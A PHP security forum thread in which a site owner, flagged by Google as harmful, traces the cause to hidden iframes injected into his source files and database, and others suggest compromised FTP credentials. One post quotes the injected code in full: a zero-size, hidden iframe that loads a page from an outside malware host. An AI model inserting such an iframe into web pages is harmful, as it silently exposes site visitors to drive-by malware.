Warning - visiting this web site may harm your computer

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
navid
Forum Commoner
Posts: 68
Joined: Tue Sep 24, 2002 3:14 am
Location: iran

Warning - visiting this web site may harm your computer

Post by navid »

Dear Friends
I have a big problem. One of my site have a problem.
When i want to visit this site by fireworks , I get this Sentence "Warning - visiting this web site may harm your computer".

This is result of google report.
I check my server and it is safe, then i think part of the website Source have a problem.
I need to know what part of my source have a problem?

Do you think googel get me log of this report ? If yes, how can i get the request to google.
Do you thinks Is any tools for help me?

I need to know what part of my source is damage.
User avatar
pcoder
Forum Contributor
Posts: 230
Joined: Fri Nov 03, 2006 5:19 am

Re: Warning - visiting this web site may harm your computer

Post by pcoder »

Some weeks back, I also suffered from the same issue. That was a web based malware attack.
For reference: visit this.
In my case, that was because of the ftp. To resolve it, I scanned by system with anti malware and left to save password on the ftp client.
Now, everything is fine.
navid
Forum Commoner
Posts: 68
Joined: Tue Sep 24, 2002 3:14 am
Location: iran

Re: Warning - visiting this web site may harm your computer

Post by navid »

Dear pcoder
Thanks for your answer .
I haven't ifream tag.
I scan my db for ifream tag or some ting like this.

You search in your source code to iframe tag? am i right?
Do you use cfkeditor in your site. I use it. and i suspicious to this?
when solve your source, how to say to google for clean the index?
how take long to solve it?
navid
Forum Commoner
Posts: 68
Joined: Tue Sep 24, 2002 3:14 am
Location: iran

Re: Warning - visiting this web site may harm your computer

Post by navid »

My problem is solved
I, find some iframe in to my database record.

I deleted and repaper possess of add record to db.
Thanks all
navid
Forum Commoner
Posts: 68
Joined: Tue Sep 24, 2002 3:14 am
Location: iran

Re: Warning - visiting this web site may harm your computer

Post by navid »

I scan all of file and find some extra source in my code like
<!-- ~ --><iframe src="http://livelnternet.com/s/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

I'm shocked , how can edit my source.
What am i do? how can i stoppage edit my source file?
User avatar
jackpf
DevNet Resident
Posts: 2119
Joined: Sun Feb 15, 2009 7:22 pm
Location: Ipswich, UK

Re: Warning - visiting this web site may harm your computer

Post by jackpf »

Sounds like you've been hacked.

Change your FTP passwords and stuff. What sort of stuff is on your server?
navid
Forum Commoner
Posts: 68
Joined: Tue Sep 24, 2002 3:14 am
Location: iran

Re: Warning - visiting this web site may harm your computer

Post by navid »

I change my ftp password.
i,m not understand your intention about stuff.

but i use CuteFTP for file uploade.
User avatar
jackpf
DevNet Resident
Posts: 2119
Joined: Sun Feb 15, 2009 7:22 pm
Location: Ipswich, UK

Re: Warning - visiting this web site may harm your computer

Post by jackpf »

Sorry, I mean what sort of scripts do you have on your server?
User avatar
Eran
DevNet Master
Posts: 3549
Joined: Fri Jan 18, 2008 12:36 am
Location: Israel, ME

Re: Warning - visiting this web site may harm your computer

Post by Eran »

This warning message means your site has been blacklisted as a source of malware. Did you try googling for the answer?
http://www.google.com/support/websearch ... swer=45449
Post Reply